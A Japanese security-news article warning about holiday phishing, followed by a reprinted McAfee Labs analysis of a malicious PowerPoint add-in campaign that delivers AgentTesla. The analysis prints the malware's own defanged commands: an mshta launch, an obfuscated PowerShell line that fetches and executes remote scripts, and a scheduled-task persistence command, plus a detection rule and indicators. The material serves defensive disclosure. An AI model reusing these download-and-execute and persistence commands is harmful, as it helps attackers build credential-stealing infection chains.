このページの本文へ

PowerPointも危ない 年末年始はフィッシング詐欺に注意

2021年11月26日 09時00分更新

文● せきゅラボ編集部

  • この記事をはてなブックマークに追加
  • 本文印刷

プライベートも仕事もフィッシングの標的

 年末年始といえば、帰省や初詣など、外出することが多い期間だった。しかし最近では、新型コロナウイルスの影響などもあり、在宅で過ごすことが多くなっている。

 今ではあまり外に出ずとも、不自由なく生活できる環境が整っていることが多い。それを可能にした要素として、クラウドやリモートワーク環境の整備でオンラインで仕事の作業がこなせるようになったことや、ネットショッピングの普及などが挙げられる。

 もっとも、このように“オンライン”になることが増えた時代では、それを狙ったサイバー犯罪も多い。

 とく気をつけたいのはフィッシング詐欺。年末年始になると、「ホリデー特価」「出荷通知」などと称したメールを送って、マルウェアにつながるリンクをクリックさせたり、個人情報を盗むための不正サイトに消費者を誘導したりする手口が多い。

 また、不在通知など運送会社からのメッセージをよそおって、フィッシングページへ誘導するSMSの被害もある。スマートフォンに「ご本人様不在の為お荷物を持ち帰りました。ご確認ください。」などといった文面のSMSが届く。ここでリンクにアクセスすると、フィッシングサイトに誘導されてしまう手口だ。

 さらに、最近ではMicrosoft PowerPointのマクロ機能を利用した新しいフィッシングも確認されている。PowerPointのファイルが添付されたスパムメールが送られてくる。悪意のある添付ファイルを開くと、VBAマクロが実行され、マルウェアが配信されるようになっている。

 このように、リンクをタップさせよう、添付ファイルをクリックさせようと、フィッシングを仕掛ける側は知恵を絞っている。年末年始の忙しい時期で早く処理しないといけない、仕事に必要そうなものだからすぐ対応しないといけない……と、被害者側が確認を怠ることをねらっているのだ。

焦って行動せず、よく確認しよう

 フィッシングへの対策は、とにかく注意すること。たとえばフィッシング詐欺で使われる偽の詐欺ページは、URLが短縮URLでわかりにくいだけでなく、ロゴや文言なども公式そっくりに作ってあることが多い。とくにスマートフォンでは詳細なヘッダー情報が確認しづらいので気をつけたい。

 あわてて行動するのではなく、メールで送られてきたならメールアドレスは正規のものか、サイトにアクセスをうながされたのならウェブアドレスが正規のものであるか、しっかりと確認したい。焦って行動すると、不審な点にも気づきにくくなってしまう。

 未知の送信者からの添付ファイルを開かないようにするのは基本だが、疑わしいメールに関しては、公式サイトのヘルプデスクなどから問い合わせて確認してみるのも有効だ。

 また、不審に思った場合や、トラブルにあった場合は、最寄りの消費生活センターなどに相談する手段もある。国民生活センターでは、新型コロナウイルス感染症関連の消費者トラブルの例を紹介している((デジタル・プラットフォームに関するトラブル(テーマ別特集)_国民生活センター)

 プライベートでも仕事でも、焦って行動せずによく確認することが鉄則。そのうえで、スマートフォンやPCに、信頼のおけるセキュリティソフトをインストールしておくのも基本だ。

 今回は、McAfee Blogの「PowerPointを悪用したフィッシングキャンペーンが増加」を紹介しよう。(せきゅラボ)

※以下はMcAfee Blogからの転載となります。

PowerPointを悪用したフィッシングキャンペーンが増加:McAfee Blog

 McAfee Labsは、Microsoft PowerPointのマクロ機能を利用した新しいフィッシングキャンペーンを確認しました。このキャンペーンでは、PowerPointのファイルが添付されたスパムメールが送られてきます。悪意のある添付ファイルを開くと、VBAマクロが実行され、AgentTeslaの亜種が配信されます(パスワードを盗むことでよく知られています)。これは、金融取引に関連するメールを装ったスパムメールが送られてきます。

 AgentTeslaは、2014年から実行されているRAT(リモートアクセスのトロイの木馬)マルウェアです。このRATはMASS(Malware-As-A-Service)としてスクリーンショット、キーロギング、クリップボードのキャプチャなどの方法で、被害者からユーザー認証情報を盗み出します。その手口は、主にフィッシングキャンペーンを介して行なわれます。

 2021年第2四半期の間に、PowerPointのマルウェアが増加しました。

図1:PPTマルウェアの動向(2021年前半)

 このキャンペーンでは、スパムメールに添付された拡張子が.ppamのPowerPointファイルにVBAコードが含まれています。使用されたセンチメントは、図2に示すように「New PO300093 Order」で金融関連のテーマでした。添付ファイル名は「300093.pdf.ppam」です。

図2:スパムメール

PPAMファイル:

 このファイルタイプは、Microsoft Office 2007のリリースとともに2007年に導入されました。PowerPointのマクロに対応するOpen XMLのアドインファイルで、追加コマンド、カスタムマクロ、PowerPointのデフォルト機能を拡張するための新しいツールなど、機能を追加するためのコンポーネントが含まれます。

 PowerPointはサードパーティが開発した新機能を追加するための「アドイン」をサポートしているため、攻撃者はこの機能を悪用してマクロを自動で実行します。

テクニカルな分析:

.ppam」ファイルを開くと、図3に示すようなマクロの存在を警告するセキュリティー通知のポップアップが表示されます。

図3:警告文(添付されたPowerPointファイルを開くと表示される)

 図4では、ppamファイル内に存在する[Content_Types].xmlファイルの内容からPowerPointのアドイン機能を特定できることがわかります。

図4:マクロが有効化されたPowerPointのアドイン機能

 PPAMファイルは次のファイルとディレクトリを含んでおり、抽出して確認が可能です。


_rels\.rels 
[Content_Types].xml 
ppt\rels\presentation.xml.rels 
ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file 
ppt\presentation.xml 


 図5に示すように、マクロを有効化するとユーザーが気づかないうちにアドインがインストールされます。PowerPointにコンテンツやスライドが含まれてないことを確認したユーザーはファイルを閉じますが、バックエンドでマクロコードが実行されて悪意のある活動が始まります。

図5:PowerPointのオプションにインストールされたアドイン

 図6に示すように、マクロはアドインのauto_open()イベント内で実行されます。つまり、プレゼンテーションが開かれてアドインがロードされると、直ちにマクロが実行されます。

img alt="" src="/img/2021/10/01/3263238/l/33d7ccff9c54728c.jpg" title="" width="596" />

図6:VBAのauto_open()イベントのコードスニペット

 PowerPointのマクロコードを実行すると、図7に示されるmshta.exe(Microsoft HTML Application)を呼び出してURLを起動します。mshtaプロセスは、CreateProcessA()APIを呼び出すことでPowerPointによって起動されます。

CreateProcessA()APIに渡されるパラメータは以下のとおり:


kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D, 

図7:mshtaとURLを含むVBAコードスニペット

mshtaのコマンドラインパラメータは以下のとおり:


mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh 

The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis. 

 その後、mshta.exeはpowershell.exeを子プロセスとして生成します。

PowerShellのコマンドラインパラメータは以下のとおり:


powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB); 

PowerShell downloads and executed script files from the above-mentioned URLs.  

The below Figure 8 shows the content of the first url 

 PowerShellは上記URLからスクリプトファイルをダウロードして実行します。

 以下の図8で示された、ひとつめのURLの内容 – “hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt”:

図8:バイナリファイルの内容

 ダウンロードされた各PowerShellファイルには、2つの大きなarrayに格納された2つのバイナリファイルが存在します。ひとつめのファイルはローダーとして機能するEXEファイルで、2つめのファイルはAgentTeslaの変種であるDLLファイルです。PowerShellは、コマンドラインに記載されたURLからAgentTeslaのペイロードを取得し、それをデコードして、MSBuild.exeを起動してペイロードを取り込みます。

タスクのスケジュール:

 継続性を持たせるため、「Task Scheduler」にスケジュールされたタスクを作成、C:Windows®System32SECOTAKSA以下にタスクファイルをドロップして、キャンペーンを効果的に実行します。

図9:新しいスケジュールタスクを作成するコードスニペット

 新しいタスクの名前は「SECOTAKSA」です。「mshta hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html」のコマンドを実行して、80分毎に一回呼び出します。

 schtasks のコマンドラインパラメータは以下のとおり:

schtasks.exe- “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%1230948@0v2x.blogspot.com/p/27.html\“” 

感染チェーン:

図10:感染チェーン

プロセスツリー:

図11:プロセスツリー

対策:

 McAfee Endpoint Security(ENS)とWindowsシステムセキュリティー(WSS)製品は、この種のマルウェアをDATでカバーします。

 SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182を含む悪意のあるPPAMドキュメントは、「W97M/Downloader.dkw」として検出されます。

 PPAMドキュメントは、AMSI-FKN!としてENSのAMSI機能でもブロックされます。

 さらに、McAfee Endpoint Security製品のエクスプロイト防止機能は、下記エキスパートルールを追加することによってマルウェアの感染チェーンをブロックして、この悪質な攻撃からお客様を保護します。

Expert Rule authored based on the below infection chain: 

POWERPNT.EXE –> mshta.exe  

Expert Rule: 

Rule { 

  Process { 
  
    Include OBJECT_NAME { -v “powerpnt.exe” } 
    
  } 
  
  Target { 
  
    Match PROCESS { 
    
       Include OBJECT_NAME { -v “mshta.exe” } 
       
       Include PROCESS_CMD_LINE { -v “**http**” } 
       
       Include -access “CREATE” 
       
    } 
    
  } 
  
  } 
  

IOCs

URLs:
hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html
hxxps://p8hj[.]blogspot[.]com/p/27.html
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt

EML files:
72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3
0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0
fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253
38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb

PPAM files:
fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182
6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3
9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b
ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd
c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d

Extracted AgentTesla files:
71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99
90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371

※本ページの内容は2021年9月22日(US時間)更新の以下のMcAfee Enterprise Blogの内容です。
原文: Malicious PowerPoint Documents on the Rise
著者: McAfee Labs(Anuradha M)

※本記事はアスキーとマカフィーのコラボレーションサイト「せきゅラボ」への掲載用に過去のMcAfee Blogの人気エントリーを編集して紹介する記事です。

■関連サイト

カテゴリートップへ